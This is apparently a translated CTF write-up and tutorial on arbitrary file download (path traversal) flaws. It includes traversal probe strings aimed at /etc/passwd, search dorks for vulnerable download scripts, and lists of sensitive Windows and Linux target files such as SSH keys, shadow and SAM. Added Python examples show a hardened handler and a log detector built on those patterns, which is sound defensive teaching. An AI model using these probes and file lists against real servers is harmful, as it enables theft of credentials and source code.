Preface:
I had come across this topic before, and a recent CTF challenge happened to test exactly it, so this post works through the arbitrary file download vulnerability in detail.
Arbitrary file download vulnerability: overview
Because of business needs, many sites have to offer a document (attachment) download feature. If the download handler does not restrict which files may be fetched, and simply serves whatever path it is handed, then a malicious user can use it to download sensitive files from the server and go on to further threats and attacks.
Harm of the arbitrary file download vulnerability
Through an arbitrary file download, an attacker can fetch any file the server process can read: the web service configuration, the application's source code, server system files, the database configuration, and information that reveals the internal network for further reconnaissance, and so on.
From the short description above it is clear that arbitrary download vulnerabilities are very common: wherever the file a user may view or download is not restricted, the flaw can be exploited and cause damage. Next we look at how such a vulnerability is used.
Using the arbitrary file download vulnerability
Where it exists
Judging by the link alone, URLs that look like the following may have an arbitrary file download vulnerability:
download.php?path=
download.php?file=
down.php?file=
data.php?file=
readfile.php?file=
read.php?filename=
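The URL patterns above all share one weakness: a parameter names a file and the handler opens it without confining the result to the intended folder. The following is an added example (not code from the original post) that puts the naive `download.php?file=` handler beside a hardened one; the sandbox directory layout, file contents and function names are this example's own assumptions, and the `WEB-INF` folder in the sandbox stands in for any directory that must never be served.

```python
# Added example (not code from the original post): a download handler in the
# vulnerable "download.php?file=" style beside a hardened one. Function names,
# the sandbox layout and the file contents are this example's own assumptions.
import os
import tempfile
from urllib.parse import unquote

# Constructed sandbox: a fake web root with a public download folder and a
# protected directory that must never be served (it stands in for WEB-INF).
WEB_ROOT = tempfile.mkdtemp(prefix="webroot_")
DOWNLOAD_DIR = os.path.join(WEB_ROOT, "downloads")
PROTECTED_DIR = os.path.join(WEB_ROOT, "WEB-INF")
os.makedirs(DOWNLOAD_DIR)
os.makedirs(PROTECTED_DIR)
with open(os.path.join(DOWNLOAD_DIR, "manual.pdf"), "wb") as fh:
    fh.write(b"%PDF-1.4 public manual")
with open(os.path.join(PROTECTED_DIR, "web.xml"), "wb") as fh:
    fh.write(b"<web-app>secret config</web-app>")


def vulnerable_download(user_path: str) -> bytes:
    """Naive handler: joins the parameter onto the folder and reads the result.

    '..' segments walk out of DOWNLOAD_DIR, and os.path.join discards the
    base entirely when user_path is absolute, so any readable file is served.
    """
    with open(os.path.join(DOWNLOAD_DIR, user_path), "rb") as fh:
        return fh.read()


class DownloadRefused(Exception):
    """Raised by the hardened handler instead of serving the file."""


def hardened_download(user_path: str) -> bytes:
    """Confined handler: the request must resolve to a regular file inside DOWNLOAD_DIR."""
    # Decode once so that an encoded %2e%2e%2f is judged as the ../ it becomes.
    candidate = unquote(user_path)
    # Null bytes and URL schemes (file://, http://) never belong in a file name.
    if "\x00" in candidate or "://" in candidate:
        raise DownloadRefused("malformed name")
    # Only a relative name is acceptable input; absolute paths are refused.
    if os.path.isabs(candidate):
        raise DownloadRefused("absolute path")
    # Canonicalise both sides (collapses '..', follows symlinks), then require
    # the resolved target to still lie under the base directory.
    base = os.path.realpath(DOWNLOAD_DIR)
    target = os.path.realpath(os.path.join(base, candidate))
    if os.path.commonpath([base, target]) != base:
        raise DownloadRefused("escapes download directory")
    if not os.path.isfile(target):
        raise DownloadRefused("not a regular file")
    with open(target, "rb") as fh:
        return fh.read()


def probe(user_path: str) -> str:
    """Report what the hardened handler does with a request: 'served' or the refusal reason."""
    try:
        hardened_download(user_path)
        return "served"
    except DownloadRefused as exc:
        return str(exc)


if __name__ == "__main__":
    # The naive handler hands out the protected file; the hardened one refuses.
    print(vulnerable_download("../WEB-INF/web.xml"))
    for request in ("manual.pdf", "../WEB-INF/web.xml", "%2e%2e/WEB-INF/web.xml",
                    "/etc/passwd", "file:///etc/passwd", "missing.pdf"):
        print(f"{request!r:32} -> {probe(request)}")
```

The important design choice is that the check is made on the resolved path, not on the raw string: blacklisting `../` alone misses encoded and symlinked variants, while `realpath` plus `commonpath` decides purely on where the request actually lands.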
Analysis of a challenge
Here a CTF question serves as the example.
Viewing the page source reveals a link in this format, so we guess it may be an arbitrary file download or a file inclusion.
Opening it shows a page written in Java.
So we can consider whether the arbitrary file download approach works here. We tried it, but oddly every parameter we constructed came back Not Found. A mentor told me that this challenge only works after switching the request method; the mentor's experience clearly runs deep.
After entering the following, the file really can be found:
filename=WEB-INF/web.xml
Two key files reveal the location of the flag; first look at com.wm.ctf.FlagController:
filename=WEB-INF/classes/com/wm/ctf/FlagController.class
A base64 string is found there; decoding it yields the flag.
This challenge involves quite a lot of background knowledge, so let us look more closely at what it covers:
First, we saw that the page is written in Java, and WEB-INF is the protected directory of a Java web application.
Besides web.xml, the WEB-INF folder also holds a classes folder containing the *.class files. These class files are the class libraries written by the site's developers; they separate the JSP front-end pages from the back-end services, which makes maintaining the site much easier. web.xml is the site's deployment descriptor, an XML file that is very important for deploying the site.
This is why we start by looking directly at WEB-INF/web.xml.
Common WEB-INF directories and files:
/WEB-INF/web.xml: the web application configuration file; describes the configuration and naming rules of servlets and other application components.
/WEB-INF/classes/: contains all the class files the site uses, servlet and non-servlet classes alike, that are not packaged in .jar files.
/WEB-INF/lib/: holds the JAR files the web application needs; only jars required by this particular application are placed here, such as the database driver jar.
/WEB-INF/src/: source directory; the java files are laid out according to their package structure.
/WEB-INF/database.properties: database configuration file.
Detection and exploitation method: find the web.xml file, infer the paths of the class files from it, fetch the class files directly, then decompile them to obtain the site's source code.
Knowing this, the challenge above is really not hard; it only tests whether your knowledge is comprehensive.
Vulnerability summary
Arbitrary file download vulnerabilities can be searched for on Google:
inurl:readfile.php?file=
inurl:download.php?file=
Judging by parameter names, roughly the following:
&readpath=
&filepath=
&Path=
&inputfile=
&url=
&Lang=
&dis=
&data=
&readfile=
&menu=
META-INF=
WEB-INF
These parameters may indicate a vulnerability (depending, of course, on how the administrator has protected them).
Summary of the files commonly targeted on Linux and Windows when a download vulnerability is exploited
windows:
C:\boot.ini // shows the system version
C:\Windows\System32\inetsrv\MetaBase.xml // IIS configuration file
C:\Windows\repair\sam // stores the passwords from the initial system installation
C:\Program Files\mysql\my.ini // MySQL configuration
C:\Program Files\mysql\data\mysql\user.MYD // MySQL root credentials
C:\Windows\php.ini // PHP configuration
C:\Windows\my.ini // MySQL configuration
C:\Windows\win.ini // a basic Windows system configuration file
linux:
/root/.ssh/authorized_keys // to log in to a remote host, create an authorized_keys file under .ssh and copy the content of id_rsa.pub into it
/root/.ssh/id_rsa // ssh private key; the public key is id_rsa.pub
/root/.ssh/id_ras.keystore // records the public key of every user who accessed the machine
/root/.ssh/known_hosts // records the public key of every user who accessed the machine
/etc/passwd
/etc/shadow // account password file
/etc/my.cnf // mysql configuration file
/etc/httpd/conf/httpd.conf // apache configuration file
/root/.bash_history // user's shell command history
/root/.mysql_history // mysql command history
/proc/mounts // devices mounted on the system
/proc/config.gz // kernel configuration file
/var/lib/mlocate/mlocate.db // database of all file paths
/proc/self/cmdline // command-line arguments of the current process
Vulnerability verification
xxx.php?f=../../../../../../etc/passwd
xxx.php?f=../index.php
xxx.php?f=file:///etc/passwd
When the parameter f is given a PHP file:
1. If the file is parsed (executed), it is a file inclusion vulnerability.
2. If the source code is displayed, it is a file viewing vulnerability.
3. If a download is prompted, it is a file download vulnerability.
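The parameter names and sensitive files listed above, together with the three verification requests, give a defender a concrete signature to look for in web-server access logs. The following is an added example (not code from the original post) that parses common-format log lines and flags requests where a file-style parameter carries traversal, a URL scheme, an absolute path, or one of the listed sensitive files. The parameter and path lists come from the post; the log lines are constructed for the example and the function names are this example's own.

```python
# Added example (not code from the original post): triage of web-server access
# logs for the probing patterns this post describes. The parameter names and
# sensitive paths are taken from the post; the log lines are constructed for
# the example and the function names are this example's own.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names that commonly carry a file path (from the post's list, plus 'f').
FILE_PARAMS = {"file", "filename", "path", "readpath", "filepath", "inputfile",
               "url", "lang", "dis", "data", "readfile", "menu", "f"}
# Lower-cased fragments of the Windows and Linux files listed above.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/etc/my.cnf", "httpd.conf",
                   "/root/.ssh/", ".bash_history", ".mysql_history", "/proc/",
                   "mlocate.db", "web-inf", "meta-inf", "boot.ini", "win.ini",
                   "metabase.xml", "repair\\sam", "php.ini", "my.ini", "user.myd")
TRAVERSAL = re.compile(r"\.\.[/\\]")
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://")
# Common/combined log format, e.g. 'ip - - [time] "GET /path HTTP/1.1" 200 512'.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')


def classify_request(target: str) -> list:
    """Return the reasons a request target looks like a file-download probe (empty = benign)."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() not in FILE_PARAMS:
            continue
        # parse_qsl already decoded once; decode again to catch double encoding (%252e).
        decoded = unquote(value).lower()
        if TRAVERSAL.search(decoded):
            reasons.append(f"traversal in {name}")
        if URL_SCHEME.match(decoded):
            reasons.append(f"url scheme in {name}")
        if decoded.startswith("/") or re.match(r"^[a-z]:\\", decoded):
            reasons.append(f"absolute path in {name}")
        for fragment in SENSITIVE_PATHS:
            if fragment in decoded:
                reasons.append(f"sensitive path {fragment} in {name}")
                break
    return reasons


def scan_log(lines) -> list:
    """Parse access-log lines and return one finding per suspicious request.

    A 2xx status on a flagged request is the important signal: the server most
    likely served the file. Any other status is recorded as an attempt.
    """
    findings = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # not in the expected log format
        reasons = classify_request(match["target"])
        if not reasons:
            continue
        status = int(match["status"])
        findings.append({
            "ip": match["ip"],
            "time": match["ts"],
            "method": match["method"],
            "target": match["target"],
            "status": status,
            "severity": "likely success" if 200 <= status < 300 else "attempt",
            "reasons": reasons,
        })
    return findings


# Constructed sample log: one benign download, several probes, one benign lang= parameter.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /download.php?file=report.pdf HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /download.php?file=../../../../etc/passwd HTTP/1.1" 200 1847',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /readfile.php?file=file:///etc/shadow HTTP/1.1" 403 0',
    '198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "POST /index?filename=WEB-INF/web.xml HTTP/1.1" 200 2210',
    '198.51.100.2 - - [10/Oct/2023:13:56:05 +0000] "GET /down.php?file=%2e%2e%2f%2e%2e%2fWindows%2Fwin.ini HTTP/1.1" 404 0',
    '192.0.2.9 - - [10/Oct/2023:13:57:12 +0000] "GET /page.php?lang=en HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["severity"], finding["ip"], finding["target"], finding["reasons"])
```

Two details matter in practice: the request method is kept in each finding, because, as the challenge above showed, a handler may only respond to a non-GET method, and the status code separates a served file from a refused one so that a 2xx on a traversal request is escalated first.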
Various file paths
Finally, a resource summary by a more experienced author is provided.
Summary
I still have a lot to learn and need to study hard. This write-up is not very detailed; for more, go and read qwzf's blog.